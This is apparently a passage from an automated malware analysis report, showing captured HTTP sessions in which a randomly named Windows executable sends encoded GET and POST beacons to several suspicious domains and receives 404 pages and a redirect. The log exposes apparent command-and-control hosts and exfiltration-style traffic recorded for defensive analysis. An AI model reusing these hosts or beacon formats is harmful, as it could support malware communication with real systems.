                                                                                                                                          Data Ascii: n8C0=FD5fONH9UoGPgvg76pzzOVychas5gh0+XLH4O08P2nT6w5Cop4IR+/2z4heaffGNCkIE3JIt1u3eT+t3PNHsux1kJH/Ml5Qn24ml5RzlfPVv6qCq1UiAR1nELVV0UInjgVedT9Nc3/V9FpFvbhMo+QYMMIVt7Y/CJ0VWrB2/prjTX985Ysr9bHk3zdh86n9uzTXC5z6QCx/3o5rSkB1OabTslrz3H8JLmjl2eNNwezguveWWR1dc2dQ9V3KIj6k0XDmbTowNW9rL7iJaV4DaeL9KKMv6dUFzQx+3YzjS8UiWM1h7IKURgRaHv33OrvILvwB+DJ3yQScKpy+ntjSVOoTFk+dPALv7UejxX/kAV4t3ELeAwkEspci8GeqRTNn/DqhW3LWUeti5Ock9sRMvAiNRubstC6bKSqvP+1NJl7D8Dn0q4lAy61PRzIiqKmSH4Xy1zAiBlFXAxIZDHpzhk1G1YI6MONRhM4Bz07EbXvP5EtmK09dl/qE+1phW/BmkUOcAcsPcQML+BrhElL0oTmPqKakNa+KO/Dc2jzuIV1Z/r7QImRDqozuIxzv7xqOf0OhfQcMcdGfHyojDQw25yVj7dbQDxEcIWCWEapEKljnkzoVdpIwerDNUy5XxY+7LtUotGYXFubhM6XvuSUkYFBIjVbTJKxhD+hcR5XbUZ38Rs73TUBRl+ROeYSBd92QoUH9N9/Adm9aXtPB0hqF+ZOrjqzJ1pvzaiNvanbrJ+hzBfbvTUy3lhbjZ6kQmiv0pe7OkoBPnv0vXcQSKAY7xKIUPkVOCgPVerAOmhoDS2xYF6rpFTO0DsnrNa40j9pevlkAxoMDqenLN7KIaF65Xe5AVJQnGsBqLoOQfjF1gj0N9AsI4ApecA/b4/EvmjcrhedcEX9I+M8qB1SzG+ZoZHMBzvUelK6CdABp2fopmKn0GAinoJTCZo4qfbmgxwPciBBjEHDKbPS7mZ1L3dbqTT6INEx1vRixaaASLvJ964YZMPYi [TRUNCATED]
                                                                                                                                          Nov 14, 2024 16:28:38.105174065 CET959INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:37 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 815
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.44984969.57.163.22780928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:39.928170919 CET410OUTGET /mdol/?vva=cTUXfXqHQ4cd-Hh0&n8C0=IBR/N437Xoj/lvQ896z8ECWd+LZ6gyFvQ9XvO2IN6lbwsaKUqIYSoc7J5DfSIcjVFUNu75pY4qnkQs5YcPPLjGotBwfrg89x7LGhzGK2QOZbkPmJ4kDXUDQ= HTTP/1.1
                                                                                                                                          Host: www.mireela.pro
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:28:40.602739096 CET974INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:40 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 815
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.4498813.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:45.688035011 CET673OUTPOST /uao9/ HTTP/1.1
                                                                                                                                          Host: www.micrhyms.info
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.micrhyms.info
                                                                                                                                          Referer: http://www.micrhyms.info/uao9/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 74 75 6b 31 6c 39 71 74 72 50 49 52 64 64 70 4e 70 53 45 63 33 6e 67 2f 67 76 6b 45 46 79 41 64 6b 6a 4c 79 47 30 6e 78 41 77 6b 73 37 39 74 52 61 6d 68 43 6a 4a 42 73 67 74 4d 33 6c 52 7a 2b 44 43 69 47 47 50 49 59 7a 57 53 5a 55 35 5a 61 49 65 32 50 57 72 70 74 30 54 66 38 62 37 6b 5a 41 54 2b 6b 51 79 6d 35 65 4d 44 4e 53 49 4c 33 42 6a 44 52 63 63 64 56 39 78 55 47 6e 42 74 36 30 49 4b 59 38 4f 52 4b 4e 41 4a 2b 65 6d 51 30 52 42 34 36 49 6a 43 38 31 34 63 4c 4d 6b 49 42 72 55 72 6d 44 54 64 6d 4b 47 6b 6b 30 34 4c 55 67 2f 68 70 77 55 56 61 70 4e 65 2f 41 32 73 37 6b 77 3d 3d
                                                                                                                                          Data Ascii: n8C0=tuk1l9qtrPIRddpNpSEc3ng/gvkEFyAdkjLyG0nxAwks79tRamhCjJBsgtM3lRz+DCiGGPIYzWSZU5ZaIe2PWrpt0Tf8b7kZAT+kQym5eMDNSIL3BjDRccdV9xUGnBt60IKY8ORKNAJ+emQ0RB46IjC814cLMkIBrUrmDTdmKGkk04LUg/hpwUVapNe/A2s7kw==


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.4498963.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:48.227636099 CET693OUTPOST /uao9/ HTTP/1.1
                                                                                                                                          Host: www.micrhyms.info
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.micrhyms.info
                                                                                                                                          Referer: http://www.micrhyms.info/uao9/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 74 75 6b 31 6c 39 71 74 72 50 49 52 64 38 5a 4e 76 31 6f 63 78 48 67 38 75 50 6b 45 50 53 41 5a 6b 6a 48 79 47 77 65 32 41 43 77 73 36 63 64 52 62 6e 68 43 69 4a 42 73 72 4e 4d 32 34 68 7a 68 44 44 65 4f 47 4e 63 59 7a 57 47 5a 55 34 70 61 49 70 4b 4d 48 72 70 76 79 54 66 36 47 72 6b 5a 41 54 2b 6b 51 79 79 54 65 4d 62 4e 53 59 62 33 42 48 66 53 52 38 64 57 71 42 55 47 6a 42 74 2b 30 49 4b 36 38 4e 56 67 4e 47 46 2b 65 6b 34 30 52 51 34 31 44 6a 43 36 37 59 64 6b 45 6d 52 65 74 6b 53 38 45 67 74 6e 4a 79 38 4a 31 2b 47 4f 78 4f 41 2b 69 55 78 70 30 4b 58 4c 4e 31 52 79 2f 2b 5a 6b 73 62 62 55 51 7a 67 54 5a 55 6f 72 62 71 76 49 5a 64 4d 3d
                                                                                                                                          Data Ascii: n8C0=tuk1l9qtrPIRd8ZNv1ocxHg8uPkEPSAZkjHyGwe2ACws6cdRbnhCiJBsrNM24hzhDDeOGNcYzWGZU4paIpKMHrpvyTf6GrkZAT+kQyyTeMbNSYb3BHfSR8dWqBUGjBt+0IK68NVgNGF+ek40RQ41DjC67YdkEmRetkS8EgtnJy8J1+GOxOA+iUxp0KXLN1Ry/+ZksbbUQzgTZUorbqvIZdM=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.4499123.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:50.778182030 CET10775OUTPOST /uao9/ HTTP/1.1
                                                                                                                                          Host: www.micrhyms.info
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.micrhyms.info
                                                                                                                                          Referer: http://www.micrhyms.info/uao9/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 74 75 6b 31 6c 39 71 74 72 50 49 52 64 38 5a 4e 76 31 6f 63 78 48 67 38 75 50 6b 45 50 53 41 5a 6b 6a 48 79 47 77 65 32 41 43 49 73 36 71 42 52 61 41 31 43 68 4a 42 73 6f 4e 4d 7a 34 68 79 37 44 43 32 43 47 4e 41 6d 7a 56 2b 5a 58 65 39 61 4b 64 65 4d 65 37 70 76 77 54 66 37 62 37 6b 41 41 56 65 67 51 79 69 54 65 4d 62 4e 53 65 2f 33 48 54 44 53 54 38 64 56 39 78 55 6a 6e 42 73 68 30 49 43 41 38 4f 35 61 4d 32 6c 2b 65 45 49 30 63 43 67 31 66 7a 43 34 34 59 64 38 45 6d 74 37 74 6b 4f 34 45 67 6f 43 4a 31 63 4a 30 34 4c 35 6b 50 5a 6e 32 6d 78 74 6e 71 54 49 4e 56 52 4e 37 2b 64 38 67 5a 33 73 48 68 73 61 55 45 4e 5a 4a 76 44 2f 44 62 69 62 68 4f 67 39 4a 50 34 45 61 79 4a 55 2f 38 6b 50 52 4b 77 79 74 69 4a 48 47 6f 37 43 45 58 4f 52 79 54 6b 33 35 74 42 4b 4c 51 73 49 48 50 76 30 58 30 54 74 4e 31 41 6d 79 35 33 38 4c 42 58 71 4d 46 50 5a 38 6d 72 59 71 52 4f 69 50 31 71 65 73 34 55 65 51 74 59 69 57 57 69 6e 30 38 69 4e 75 52 58 63 63 46 79 5a 34 46 59 69 58 61 47 30 70 65 36 2f 35 [TRUNCATED]
                                                                                                                                          Data Ascii: n8C0=tuk1l9qtrPIRd8ZNv1ocxHg8uPkEPSAZkjHyGwe2ACIs6qBRaA1ChJBsoNMz4hy7DC2CGNAmzV+ZXe9aKdeMe7pvwTf7b7kAAVegQyiTeMbNSe/3HTDST8dV9xUjnBsh0ICA8O5aM2l+eEI0cCg1fzC44Yd8Emt7tkO4EgoCJ1cJ04L5kPZn2mxtnqTINVRN7+d8gZ3sHhsaUENZJvD/DbibhOg9JP4EayJU/8kPRKwytiJHGo7CEXORyTk35tBKLQsIHPv0X0TtN1Amy538LBXqMFPZ8mrYqROiP1qes4UeQtYiWWin08iNuRXccFyZ4FYiXaG0pe6/5Hpn3hmPT7y+E/6uXJoxxLwKAPy/GTqdywmpJzuRrHE4UiJ4Lse+ehjCc09Gg5rXTvggIbhXKSQJHoGGOFzumuryjGGcMmaNvLbN+alkFaURbXWep4XWPOe+Z2u7S07AyM3H2tsZ4NWMbQ04h8EctJ3mXZBWzF5amL3VI5vqBaBqs4OiilH5MYsfrao4LpmwT5StN4VCccsqtLfqwS00Jnd081XhzQwHThsoKwFNX+Z30G5g6KtdsOyztz5QRUobmFwqzjq3l5WeVAHym6v026d41z3oKn+INKBmRIgOfbMtTotLX8TkaJ66Y7oTt31Zod2h294p2LJ2+NlEZnKgf3h9wt2sAgXW7K+vdtzIuiYgcmh64name0nXCZyFqplsy1zwks8omT+d/D7WWfWXYMl9TWj0G+XvhaeIKRqc43btUDW8d6Wfpr03ttP6bEU0vSWuZ0gHTqg3/EZBbmMhUKPSKLocXUB5Eavv0gljczVOkGZWZqE4iBuc0WVcGRcZ+Zi2XkSdvhW9VnTFDdB2aYoyPEXPcR7E0kggGSKqmvoNPp17bfJP/1qpPdJzRcxJXcJHzT2Dra7tqpaesh6497YkZBvvUrxX93MkqZ/zudHYhUHLY/OE69q320XulnD3EglZGor8jWPjsgINiTyVynBRZjKu1bwejbe [TRUNCATED]


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.4499283.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:53.319679976 CET412OUTGET /uao9/?n8C0=gsMVmNPJ8N9SSsJigThKyHE8l/ZIDUN0sVKqNnzNMDh6tN9OUV5g1ZhKr/MfkgGiHAPXbKUUpWb7OZdwItOAQ/tfwzfeb+QiDBGBZgrMbvLdS9fMPgCGa9I=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1
                                                                                                                                          Host: www.micrhyms.info
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:28:53.979857922 CET401INHTTP/1.1 200 OK
                                                                                                                                          Server: openresty
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:53 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 261
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 38 43 30 3d 67 73 4d 56 6d 4e 50 4a 38 4e 39 53 53 73 4a 69 67 54 68 4b 79 48 45 38 6c 2f 5a 49 44 55 4e 30 73 56 4b 71 4e 6e 7a 4e 4d 44 68 36 74 4e 39 4f 55 56 35 67 31 5a 68 4b 72 2f 4d 66 6b 67 47 69 48 41 50 58 62 4b 55 55 70 57 62 37 4f 5a 64 77 49 74 4f 41 51 2f 74 66 77 7a 66 65 62 2b 51 69 44 42 47 42 5a 67 72 4d 62 76 4c 64 53 39 66 4d 50 67 43 47 61 39 49 3d 26 76 76 61 3d 63 54 55 58 66 58 71 48 51 34 63 64 2d 48 68 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?n8C0=gsMVmNPJ8N9SSsJigThKyHE8l/ZIDUN0sVKqNnzNMDh6tN9OUV5g1ZhKr/MfkgGiHAPXbKUUpWb7OZdwItOAQ/tfwzfeb+QiDBGBZgrMbvLdS9fMPgCGa9I=&vva=cTUXfXqHQ4cd-Hh0"}</script></head></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.449962162.241.63.7780928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:59.402383089 CET682OUTPOST /62tt/ HTTP/1.1
                                                                                                                                          Host: www.estrela-b.online
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.estrela-b.online
                                                                                                                                          Referer: http://www.estrela-b.online/62tt/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 37 63 35 58 52 59 62 6d 77 4d 61 44 34 6e 63 57 49 6f 54 4e 6c 6f 72 79 76 69 57 36 57 68 34 49 61 42 47 32 45 41 56 6a 48 4e 65 5a 77 4f 7a 68 77 65 56 6e 75 78 71 4a 4b 55 54 4a 4e 44 64 54 4e 35 4f 35 62 7a 43 38 66 49 57 30 68 47 79 54 76 38 44 6d 77 36 59 4d 46 48 54 42 6b 65 31 58 75 4b 5a 77 33 54 68 56 32 37 69 57 71 46 62 37 53 30 46 4d 73 7a 30 55 53 57 59 63 53 79 4d 4d 6b 4b 73 42 51 71 61 6f 46 55 4c 55 6a 6f 72 6e 73 63 51 45 6b 70 6e 75 50 78 61 68 2f 6c 47 73 68 72 79 7a 55 47 74 5a 44 67 73 6c 56 6c 71 6e 6a 68 2f 68 6a 45 38 4c 35 36 68 36 68 53 75 50 55 51 3d 3d
                                                                                                                                          Data Ascii: n8C0=7c5XRYbmwMaD4ncWIoTNloryviW6Wh4IaBG2EAVjHNeZwOzhweVnuxqJKUTJNDdTN5O5bzC8fIW0hGyTv8Dmw6YMFHTBke1XuKZw3ThV27iWqFb7S0FMsz0USWYcSyMMkKsBQqaoFULUjornscQEkpnuPxah/lGshryzUGtZDgslVlqnjh/hjE8L56h6hSuPUQ==
                                                                                                                                          Nov 14, 2024 16:29:01.153918028 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:59 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                          Connection: Upgrade
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          X-Newfold-Cache-Level: 2
                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                          Content-Length: 1167
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b [TRUNCATED]
                                                                                                                                          Data Ascii: R]o6}a}F=8V=x-x9$uBsNX[]&s{]\HE(-lFqZf`+nc8>cbh:=l5{5{h1Py"dMn-H^h zL W8!b3NG,pT{)~GPxN![|FO_,JTynjUB~GMP=khVZ5[titm9lUE<mzR7VS-mP}=Tjd9Nu0lVK7Ci%,h$3iA;}u=i#uvqi631$2{bLCdw<thu1Y!xip#M;IGj=?:WGtyINO)8T#vUe5[iP5WS{x>u>JL2Sn`'AK7]-@MB/DGEz"y0l fdMn-H9 ~3RhX^ q]D86BxU(QSPzdl,j24zMc.1Se\n_g/=^T>WVSM
                                                                                                                                          Nov 14, 2024 16:29:01.153973103 CET329INData Raw: 0a f7 01 48 2a 4c 97 bd 49 74 86 6c 5b c8 33 0a 03 71 d8 f7 7d 7e 62 26 a7 06 41 1e af 45 d9 69 a3 78 4f 28 5c 42 41 9e 2e 43 12 b7 ee b4 02 91 b1 48 e6 85 b8 c9 de 94 46 da 9b 6c 14 ca 22 3a b0 e0 49 51 da 01 de 0f 9f 3b 34 06 fb 6c fb 1c 7b f2
                                                                                                                                          Data Ascii: H*LItl[3q}~b&AEixO(\BA.CHFl":IQ;4l{$&#vBmQz"3p6`)uBn?`_Ca>w=Ox^=l2^_7GV5dB;SxCGyE?RZieNKy26d{n~,6:
                                                                                                                                          Nov 14, 2024 16:29:01.154249907 CET329INData Raw: 0a f7 01 48 2a 4c 97 bd 49 74 86 6c 5b c8 33 0a 03 71 d8 f7 7d 7e 62 26 a7 06 41 1e af 45 d9 69 a3 78 4f 28 5c 42 41 9e 2e 43 12 b7 ee b4 02 91 b1 48 e6 85 b8 c9 de 94 46 da 9b 6c 14 ca 22 3a b0 e0 49 51 da 01 de 0f 9f 3b 34 06 fb 6c fb 1c 7b f2
                                                                                                                                          Data Ascii: H*LItl[3q}~b&AEixO(\BA.CHFl":IQ;4l{$&#vBmQz"3p6`)uBn?`_Ca>w=Ox^=l2^_7GV5dB;SxCGyE?RZieNKy26d{n~,6:
                                                                                                                                          Nov 14, 2024 16:29:01.154696941 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:59 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                          Connection: Upgrade
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          X-Newfold-Cache-Level: 2
                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                          Content-Length: 1167
                                                                                                                                          Content-Type: text/html; charset=UTF-8
